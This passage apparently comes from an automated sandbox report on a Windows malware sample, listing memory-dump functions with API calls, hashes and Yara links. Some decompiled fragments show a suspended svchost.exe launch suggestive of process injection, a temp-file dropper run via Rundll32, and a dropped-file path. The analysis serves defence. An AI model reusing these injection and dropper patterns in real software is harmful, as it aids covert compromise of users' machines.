                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006325E4, Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • UnDecorator::UScore.LIBVCRUNTIME ref: 006325EC
                                                                                                                                                    • DName::DName.LIBVCRUNTIME ref: 006325F6
                                                                                                                                                      • Part of subcall function 00630CE9: DName::doPchar.LIBVCRUNTIME ref: 00630D10
                                                                                                                                                    • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00632635
                                                                                                                                                    • DName::operator+=.LIBVCRUNTIME ref: 0063263F
                                                                                                                                                    • DName::operator+=.LIBCMT ref: 0063264E
                                                                                                                                                    • DName::operator+=.LIBCMT ref: 0063265A
                                                                                                                                                    • DName::operator+=.LIBCMT ref: 00632667
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1480779885-0
                                                                                                                                                    • Opcode ID: 1a69dd49d508d6f05d1eed14f254328ab10ab7d0064830183d5eabb4c3edf9d9
                                                                                                                                                    • Instruction ID: 6cf22091545dc8fae2160b296331ede1725c39bc8d1297ec3fa7fa63a64ea329
                                                                                                                                                    • Opcode Fuzzy Hash: 1a69dd49d508d6f05d1eed14f254328ab10ab7d0064830183d5eabb4c3edf9d9
                                                                                                                                                    • Instruction Fuzzy Hash: 0811A130400204AFDB08EF64C967AEE7BA6EF12300F04419DE4029B2E3CB70AA46CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612C20, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47processstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00612C20(void** _a4, intOrPtr* _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				char _v348;

				E006114A0( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
				lstrcatA( &_v348, "\\System32\\svchost.exe");
				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20) != 0) {
					 *_a4 = _v20.hProcess;
					 *_a8 = _v20.hThread;
					return 1;
				}
				return 0;
			}






                                                                                                                                                    0x00612c31
                                                                                                                                                    0x00612c39
                                                                                                                                                    0x00612c51
                                                                                                                                                    0x00612c63
                                                                                                                                                    0x00612c91
                                                                                                                                                    0x00612c9d
                                                                                                                                                    0x00612ca5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612ca7
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00612C51
                                                                                                                                                    • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00612C63
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00612C89
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateEnvironmentProcessVariablelstrcat
                                                                                                                                                    • String ID: D$SystemRoot$\System32\svchost.exe
                                                                                                                                                    • API String ID: 3510847443-1175289849
                                                                                                                                                    • Opcode ID: 31be5b32b2ec4e43f84a273a09ec2cc47a61a25a0eb67c1e9333824c63f4ae4a
                                                                                                                                                    • Instruction ID: df0cf71db5b9f743003fb1bfaffdeacfea5bf63a35fb13d345716aa9ee7d176b
                                                                                                                                                    • Opcode Fuzzy Hash: 31be5b32b2ec4e43f84a273a09ec2cc47a61a25a0eb67c1e9333824c63f4ae4a
                                                                                                                                                    • Instruction Fuzzy Hash: 4F0175B1A40309AFE750CFD0DC46FE97779EB88B05F048055B709AF2C0EAB46A888B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00664789, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 006647D1
                                                                                                                                                    • __fassign.LIBCMT ref: 006649B0
                                                                                                                                                    • __fassign.LIBCMT ref: 006649CD
                                                                                                                                                    • WriteFile.KERNEL32(?,0065CB6B,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00664A15
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00664A55
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00664B01
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4031098158-0
                                                                                                                                                    • Opcode ID: 8473c9af6230ebe760b0d16e3e1b328585c25e9425aa9c45e11666fc22c3b4c1
                                                                                                                                                    • Instruction ID: 2d6e01c3aa4cf644946ddf2de5e1739d8d5912cc999a6a877593992ce3851165
                                                                                                                                                    • Opcode Fuzzy Hash: 8473c9af6230ebe760b0d16e3e1b328585c25e9425aa9c45e11666fc22c3b4c1
                                                                                                                                                    • Instruction Fuzzy Hash: A3D17971D042589FCF15CFE8C980AEDBBB6BF48314F28416AE855BB342DA31A946CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064BA66, Relevance: 9.2, APIs: 6, Instructions: 221COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0064BAF6
                                                                                                                                                    • _free.LIBCMT ref: 0064BB11
                                                                                                                                                    • _free.LIBCMT ref: 0064BB1C
                                                                                                                                                    • _free.LIBCMT ref: 0064BC29
                                                                                                                                                      • Part of subcall function 00650D67: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00650DA8
                                                                                                                                                    • _free.LIBCMT ref: 0064BBFE
                                                                                                                                                      • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
                                                                                                                                                      • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
                                                                                                                                                    • _free.LIBCMT ref: 0064BC1F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$Heap$AllocateErrorFreeLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4150789928-0
                                                                                                                                                    • Opcode ID: c2b63ae32c3e94fcf081bb5e0c77435cebd93f4ac2ca27deee230ad940efa425
                                                                                                                                                    • Instruction ID: 2ee21c38f225fcb60dd4f0fd48416cdbdb9f644bfc713584db89e8653d3686bd
                                                                                                                                                    • Opcode Fuzzy Hash: c2b63ae32c3e94fcf081bb5e0c77435cebd93f4ac2ca27deee230ad940efa425
                                                                                                                                                    • Instruction Fuzzy Hash: 48516A76A04204ABDF14AF68D882AFA77A7DF85750F14105DF941AB341EF32DE06C260
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0062F53E, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,0062F535,0062BF5F), ref: 0062F54C
                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0062F55A
                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0062F573
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0062F535,0062BF5F), ref: 0062F5C5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                    • Opcode ID: 738c472af433c9e404394f22ea1ace86725751d2cf075f89d8517c0267ee9571
                                                                                                                                                    • Instruction ID: 204a7d6d7eb15529aa1da39e8183b2719385194574fe24b3c34782d6b63e282e
                                                                                                                                                    • Opcode Fuzzy Hash: 738c472af433c9e404394f22ea1ace86725751d2cf075f89d8517c0267ee9571
                                                                                                                                                    • Instruction Fuzzy Hash: 1601D83210DB226EA7642FB5BC95A5627A7DB127B4B30023EF410656E1EF225C05DAD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0061EDE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Mpunct$GetvalsH_prolog3_catch
                                                                                                                                                    • String ID: $+xv
                                                                                                                                                    • API String ID: 921663424-1686923651
                                                                                                                                                    • Opcode ID: 204b8f03e3362b8e00f1c8e1308f2be45f0a15e0c6bff39f66c2372d1c76a1d3
                                                                                                                                                    • Instruction ID: b8a4de21919c6c9b41ba38f3b00efc782af09e8035aeab370345db9e3dca163f
                                                                                                                                                    • Opcode Fuzzy Hash: 204b8f03e3362b8e00f1c8e1308f2be45f0a15e0c6bff39f66c2372d1c76a1d3
                                                                                                                                                    • Instruction Fuzzy Hash: F121A1B1904AA2AEDB45DF6484C05AB7FE9AF0D300B18419EFC48CB602D334DA52CFE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064D5B6, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3033488037-0
                                                                                                                                                    • Opcode ID: c888807f24302801e6897459d4917f85b90901e7b6927572706e0c8af5776d74
                                                                                                                                                    • Instruction ID: ebcb240083d59b130349f7985e83924dc97dd759f70f6df7d22a1e865de69123
                                                                                                                                                    • Opcode Fuzzy Hash: c888807f24302801e6897459d4917f85b90901e7b6927572706e0c8af5776d74
                                                                                                                                                    • Instruction Fuzzy Hash: 5751B172A00704AFDB20DF69CC81AAAB7F6FF59724F15466DE809D7250E771E901CB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064E3F8, Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0064E466
                                                                                                                                                    • _free.LIBCMT ref: 0064E486
                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0064E4E7
                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0064E4F9
                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0064E506
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __crt_fast_encode_pointer$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 366466260-0
                                                                                                                                                    • Opcode ID: 0a246e2be43ee6971f6fa21ed139a5c34aea6aa1ad62d7262219dddf06e39503
                                                                                                                                                    • Instruction ID: e2d0de07a903451782d99c5bc073fb2b6fc3190bcf46bf299eb51a94563dd17e
                                                                                                                                                    • Opcode Fuzzy Hash: 0a246e2be43ee6971f6fa21ed139a5c34aea6aa1ad62d7262219dddf06e39503
                                                                                                                                                    • Instruction Fuzzy Hash: 4F41B236A00214AFCB14DFA8C881A99B7E7FF85714F1684ADE645EB341E731ED02CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00665D6E, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00665D84
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 00665D8E
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00665D95
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00665DB3
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00665DD9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer$ErrorLast__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1114809156-0
                                                                                                                                                    • Opcode ID: 2b6010a381e08ab8f9599eae5f223e2d35e6a7d2781c4a9ca8ce6a2d5a34f16e
                                                                                                                                                    • Instruction ID: b40c99e16b56ca48a67029163bb4a75eba1e5beefc3be05842078a4d2c8e5f43
                                                                                                                                                    • Opcode Fuzzy Hash: 2b6010a381e08ab8f9599eae5f223e2d35e6a7d2781c4a9ca8ce6a2d5a34f16e
                                                                                                                                                    • Instruction Fuzzy Hash: 55011371801629BBCB21AFA5CC099DE7F7EEF40760F104208B826A61A0DB309A40DBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065AA2B, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0065AA43
                                                                                                                                                      • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
                                                                                                                                                      • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
                                                                                                                                                    • _free.LIBCMT ref: 0065AA55
                                                                                                                                                    • _free.LIBCMT ref: 0065AA67
                                                                                                                                                    • _free.LIBCMT ref: 0065AA79
                                                                                                                                                    • _free.LIBCMT ref: 0065AA8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 2951b9d4f14213b8d8f7e99c5c0e0a16a611b2ade6e769bf9a0326b6693e813f
                                                                                                                                                    • Instruction ID: 394e80a2655f6afd5cb45d058c0cf3249c52af912358ad764743f2f8df12cc2f
                                                                                                                                                    • Opcode Fuzzy Hash: 2951b9d4f14213b8d8f7e99c5c0e0a16a611b2ade6e769bf9a0326b6693e813f
                                                                                                                                                    • Instruction Fuzzy Hash: B4F01233544240AB9760EB9CE786C5A77DBBB02752F64290DF849E7A40CB31FC85CA65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064B352, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: C:\Users\Public\snd32sys.exe
                                                                                                                                                    • API String ID: 0-2460037051
                                                                                                                                                    • Opcode ID: 5837d1cd4a2f21217252382a047b0423301765d26b57d7faeebca7a2c6ddb3f1
                                                                                                                                                    • Instruction ID: 4c75bc51bdba83f884b1257efe9b8841ee60410acdea7b903cb6071f7b947aa0
                                                                                                                                                    • Opcode Fuzzy Hash: 5837d1cd4a2f21217252382a047b0423301765d26b57d7faeebca7a2c6ddb3f1
                                                                                                                                                    • Instruction Fuzzy Hash: D63180B1A04218EBDB61AF99DC819EEBBFAEB84310B10516AE500E7211D7B0CE41DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00613B10, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E00613B10(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v264;
				char _v524;
				char _v784;

				GetTempPathA(0x104,  &_v524);
				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
				if(E00613AA0(_a4,  &_v264, _a4, _a8) != 1) {
					return 0;
				}
				_push(_a8);
				if(E006133A0(_a4) != 1) {
					return E006136A0( &_v264);
				}
				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
				return E006136A0( &_v784);
			}






                                                                                                                                                    0x00613b25
                                                                                                                                                    0x00613b40
                                                                                                                                                    0x00613b60
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613bb7
                                                                                                                                                    0x00613b65
                                                                                                                                                    0x00613b75
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613bb2
                                                                                                                                                    0x00613b8a
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 00613B25
                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,006142C0,00000000,?), ref: 00613B40
                                                                                                                                                      • Part of subcall function 00613AA0: CreateFileA.KERNEL32(00611691,40000000,00000000,00000000,00000002,00000080,00000000,00611691), ref: 00613AC6
                                                                                                                                                      • Part of subcall function 00613AA0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00613AE7
                                                                                                                                                      • Part of subcall function 00613AA0: CloseHandle.KERNEL32(000000FF), ref: 00613AF1
                                                                                                                                                    • wsprintfA.USER32 ref: 00613B8A
                                                                                                                                                      • Part of subcall function 006136A0: CreateProcessA.KERNEL32(00000000,00613BB2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 006136D7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                                                                                                                                                    • String ID: Rundll32.exe %s, start
                                                                                                                                                    • API String ID: 130250823-2967502992
                                                                                                                                                    • Opcode ID: 150c1a863df04e00d6a6417665ad8f8b5979bb9b2b3070ee544f880f7ea9c817
                                                                                                                                                    • Instruction ID: 91f581fec803f5813cd08dac6dccd4d5304561b9259b0cff43ee00a89c653978
                                                                                                                                                    • Opcode Fuzzy Hash: 150c1a863df04e00d6a6417665ad8f8b5979bb9b2b3070ee544f880f7ea9c817
                                                                                                                                                    • Instruction Fuzzy Hash: 66118CFAC041246BDB10DF50ECC5EE9737E9B58300F448695FA4A86351FA71DBD88B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006539F6, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                    • Opcode ID: 0472cd9bfd4df4e0a16aeb6247a0b21195ebc8b914c63038fd8ff762ae24c2fb
                                                                                                                                                    • Instruction ID: 8e763130beeb2bebf11c1415518764bdbaef8130e828029deeadbec4b40f0361
                                                                                                                                                    • Opcode Fuzzy Hash: 0472cd9bfd4df4e0a16aeb6247a0b21195ebc8b914c63038fd8ff762ae24c2fb
                                                                                                                                                    • Instruction Fuzzy Hash: BAB136329042A59FDB11CF28C8917EEBBE6EF55781F1481AAEC51EB341D6349E09CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0061A083, Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 838279627-0
                                                                                                                                                    • Opcode ID: ab71c982e405236239582c71eef84dc031f0c2cbbf09ec6503826c7bf6b9a7fb
                                                                                                                                                    • Instruction ID: 533876944e139910d9439d3729b82d961f6bbe2f05fc37a1450681bbc46de25a
                                                                                                                                                    • Opcode Fuzzy Hash: ab71c982e405236239582c71eef84dc031f0c2cbbf09ec6503826c7bf6b9a7fb
                                                                                                                                                    • Instruction Fuzzy Hash: 92B16875901259DFDF10DFE4C880AEEBBBAFF08310F184059E805AB215D731AE86CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006B1F45, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.487458396.00000000006B1000.00000040.00020000.sdmp, Offset: 006B1000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __common_dcos_data
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1949606188-0
                                                                                                                                                    • Opcode ID: 4b2741d3fe2882215e4cd48b98e410eb67785da3d1f0ee4fb8b4b89a2c25ab79
                                                                                                                                                    • Instruction ID: 86581360196ce86cfd345b872fd5407540c700c0124de4d6c32445ddda410ecb
                                                                                                                                                    • Opcode Fuzzy Hash: 4b2741d3fe2882215e4cd48b98e410eb67785da3d1f0ee4fb8b4b89a2c25ab79
                                                                                                                                                    • Instruction Fuzzy Hash: 66218575018B894B8B61FB54C060EFB73F2FEA9388F804B1EE4C697164EF649685C741
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00657ACF, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 006479A0: _free.LIBCMT ref: 006479AE
                                                                                                                                                      • Part of subcall function 00656894: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,006566C4,?,00000000,00000000), ref: 00656936
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00657B37
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00657B3E
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00657B7D
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00657B84
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                    • Opcode ID: c8886bf6b36215bc01a056684f21efda1bae4fc766eb2feda6b73fa699cd8eee
                                                                                                                                                    • Instruction ID: 0252b883479ce345315c259bdc8cb9ed21897650785cf9035940215798894f8a
                                                                                                                                                    • Opcode Fuzzy Hash: c8886bf6b36215bc01a056684f21efda1bae4fc766eb2feda6b73fa699cd8eee
                                                                                                                                                    • Instruction Fuzzy Hash: C421FCB160821ABFDB606F65DC81D6BB79FEF10365F108528FD2597241EB30EC0597A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00647810, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c1c56fc9f033b8836ece580a3da96ed56469dc8d15130c51a38af8d6df741b24
                                                                                                                                                    • Instruction ID: 7812c55e13a38f1e9a24ea54d948cc0a1558fe531e3be006aa6fa2d92d8a15f1
                                                                                                                                                    • Opcode Fuzzy Hash: c1c56fc9f033b8836ece580a3da96ed56469dc8d15130c51a38af8d6df741b24
                                                                                                                                                    • Instruction Fuzzy Hash: D421C371608205BFDB60AF61DC88DAB77AFEF10364B104639F91997651EB30EC11D7A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065193B, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4343b0e94ce62e64eee612a0ae1cdcdcad17441471d70c29761ad996f14f4a64
                                                                                                                                                    • Instruction ID: 780a084e3161af8f43a7b8fc9552b26f55bd990920797a063e0447e12213ff3e
                                                                                                                                                    • Opcode Fuzzy Hash: 4343b0e94ce62e64eee612a0ae1cdcdcad17441471d70c29761ad996f14f4a64
                                                                                                                                                    • Instruction Fuzzy Hash: 43210531A01222BBDB315B64CC99B5A376AAB03771F210711EC92AF391DB30DD09C7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00650A7B, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                    • _free.LIBCMT ref: 00650ADD
                                                                                                                                                    • _free.LIBCMT ref: 00650B13
                                                                                                                                                    • SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                    • Opcode ID: 1a3987d5fc75c83676af9f40384d97283d1c826969473fdc621f3ded79f6ac3e
                                                                                                                                                    • Instruction ID: 47346d43beed1cbbc7d84fd2e511d04b6f4fa49d6533d63844adb8dbeccb5c97
                                                                                                                                                    • Opcode Fuzzy Hash: 1a3987d5fc75c83676af9f40384d97283d1c826969473fdc621f3ded79f6ac3e
